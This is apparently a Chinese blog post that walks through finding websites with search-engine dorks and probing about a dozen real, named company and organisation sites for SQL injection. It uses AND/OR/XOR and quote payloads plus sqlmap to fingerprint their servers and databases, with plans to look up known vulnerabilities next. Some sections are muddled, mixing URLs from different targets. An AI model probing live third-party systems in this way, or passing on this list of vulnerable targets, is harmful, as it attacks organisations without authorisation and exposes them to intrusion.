记一次实战案例
  f7zGpnIs3WfD 2023年11月19日 46 0

1、目标:inurl:news.php?id=
URL:https://www.lghk.com/news.php?id=5

网站标题:趋时珠宝首饰有限公司

手工基础判断:

And用法

and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

原始网页:https://www.lghk.com/news.php?id=5

构造url1:https://www.lghk.com/news.php?id=5 AND 1=1

     ![6886fcc875aa1bdb9d5ed88e3c80e1ee_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png](https://s2.51cto.com/images/202311/4109571782834d4931689368a108a91da68d96.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

构造url2:https://www.lghk.com/news.php?id=5 AND 1=2

dc253f09b10ef82cccb89a8e2adaa3b4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入。

or用法:只要有一个为真,那么整条语句都是真

构造url1:https://www.lghk.com/news.php?id=5 or 1=1 正常页面只有News(会显示News, Awards & Cert.)

构造url2:https://www.lghk.com/news.php?id=5 or 1=2 正常页面只有News(会显示News, Awards & Cert.)

0dfe0199ff3c76b11f973a053147512a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

xor用法:同为真同为假,那就是假;一真一假才为真

构造url1:https://www.lghk.com/news.php?id=5 xor 1=1 (显示正常,全部数据都给)

构造url2:https://www.lghk.com/news.php?id=5 xor 1=2 (显示正常,全部数据都给)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’ (输入单引号会显示报错,后端代码可能有问题 )

96e2946885478825ce0cadc1b80defb4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

双引号

构造url1:https://www.lghk.com/news.php?id=”5”(显示页面正常 )

6863db5be9f191a2aaeee9a73627e925_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在多种注入,可以看到这个网站的应用信息,web应用技术:Nginx,PHP 7.4.33

后端DBMS:MySQL>=5.0(MariaDB fork)

abcd698bf32631f92c9f8619b9cc6ef2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2、目标:inurl:news.php?id=
URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

20a390bff33c9c6b677aacbc815c8a8a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 (显示报错页面这通常表示可能存在 SQL 注入漏洞)

701a9c33618da008ba653dbff38a4f03_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 (显示1的页面,页面页发生了变化)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’ (输入单引号会显示报错,后端代码可能有问题 )

c5e24ba7f21848e8bba70c1ff70928bb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 (页面没发生变化)

1ef8bbb80bfdea6e79018c33adf1e7b7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

xor用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 (显示1的页面,页面页发生了变化)

c5e24ba7f21848e8bba70c1ff70928bb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 (页面没发生了变化)

1ef8bbb80bfdea6e79018c33adf1e7b7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

字符串类型判断

单引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3’ (输入单引号会显示报错,后端代码可能有问题 )

eefef2c0e979e0f2eaf2d74cb16a8b40_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png双引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?”id=”5”(显示错误 )

726cd617638faa97dd8a601cbd3b1125_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

c6aba6c69c91089d45e4506897bca608_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

abcd698bf32631f92c9f8619b9cc6ef2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3、目标:inurl:news.php?id=
URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

ce3dec1ba4e939ea43bf1687c9027fdb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 or 1+=2(页面显示正常)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 2012 r2 or 8.1

中间件是 PHP 5.4.45, Microsoft IIS 8.5

数据库是MySQL5.0

(知道这些信息我们可以查找历史漏洞进行下一步操作)

ad3b3d4b7831bdf07f466f7c3ae7366a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4、目标:inurl:asp?id=
URL:http://www.jgbr.com.cn/ShowProduct.asp?ID=217

网站标题:江苏力星通用钢球股份有限公司

手工基础判断:

And用法

构造url1:http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

2ecd5d6d039af54596305b1a78f02709_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

3828108be1f1e2592670134c73f37032_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5、目标:inurl:asp?id=
URL:http://www.hosen.cn/product.php?pid=500

网站标题:南京浩晃科技有限公司

手工基础判断:

And用法

构造url1:http://www.hosen.cn/product.php?pid=500 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

3d9cb68128bfcf0bad7bf21e5ccac498_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.hosen.cn/product.php?pid=500 AND+1=2 (报错页面可能存在 SQL 注入漏洞)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

网站信息:PHP 5.4.26, Nginx

(知道这些信息我们可以查找历史漏洞进行下一步操作)

06de72caafc00687e0782340052684e3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6、目标:inurl:asp?id=
URL:http://www.cuc-china.net/about.asp?id=124

网站标题:世优认证 (上海)有限公司

手工基础判断:

And用法

构造url1:http://www.cuc-china.net/about.asp?id=124 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

c5f8732862d0b95f40a64d03d6c8f409_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.cuc-china.net/about.asp?id=124 AND+1=2(报错页面可能存在 SQL 注入漏洞)

aa9dfb76deb2dd2b6933bea714ec21da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 7或2008 R2

web应用技术:Microsoft IIS 7.5、ASP、ASP。NET

后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

dded5e01fd57844dc62113a9ccd496e0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

7、目标:inurl:asp?id=
URL:http://www.ywbaili.com/news.php?id=1

网站标题:百利飞镖

手工基础判断:

And用法

构造url1:http://www.ywbaili.com/news.php?id=1 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

94bceca2cf401727fc776a0bd816e471_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

a12e6e97b188135e139cf3c357091ba7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows XP或2003

web应用技术:ASP.NET、Microsoft IIS 6.0

后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

59ebbbb4e7f61446136b153647791615_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

8、目标:inurl:news.php?id=
URL:https://www.szdwwy.com/service_show.php?id=2

网站标题:东吴服务产业集团 (江苏) 有限公司

And用法

构造url1:https://www.szdwwy.com/service_show.php?id=2 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

ad5228ed45a2d3c5534457d1945abaa5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

后端DBMS是MySQL

web应用程序技术:Apache

后端DBMS:MySQL>=5.0.12

(知道这些信息我们可以查找历史漏洞进行下一步操作)

8e07e7be4a29679b706454c4a2d6bfb2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

9、目标:inurl:news.php?id=
URL:http://www.icet.org.cn/news.asp?id=367

网站标题:能源与交通创新中心

And用法

构造url1:http://www.icet.org.cn/news.asp?id=367 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.icet.org.cn/news.asp?id=367 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

7f89b5223bf1cdcf26b8f5988da37d36_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 2012或8

web应用程序技术:Microsoft IIS 8.0、ASP.NET、ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

0dcb1f0872e5ab86567fc1943bff5d6f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

10、目标:inurl:band_info.php?id=
URL:http://www.fine-stamping.com/contact.asp?id=10

网站标题:苏州范斯特机械科技有限公司

And用法

构造url1:http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.fine-stamping.com/contact.asp?id=10 AND+1=2(显示正常页面这通常表示可能存在 SQL 注入漏洞)

字节符

构造url2:http://www.fine-stamping.com/contact.asp?id=10’(显示报错)

f3add07bb18ceca7ea7676820246ca66_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows

web应用技术:ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

764d2cafcd629727c2235ecdc15540c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

问题:1
URL:http://www.syyqz.com/lianxi.php?pid=6&id=6

手工测试是有漏洞,但是使用sqlmap跑也是有注入点,但是就是跑不出数据库信息

6672a73f91c632d58ed58e5ab8a8d647_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

问题:2
URL:http://www.isriht.com/index.php?id=344

输入了and 1=1 显示下图这样的操作

5334f407249b2d8387f8619d2165b664_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读
  7o0lrI1v52Tn   2023年12月10日   31   0   0 phpCTFweb
f7zGpnIs3WfD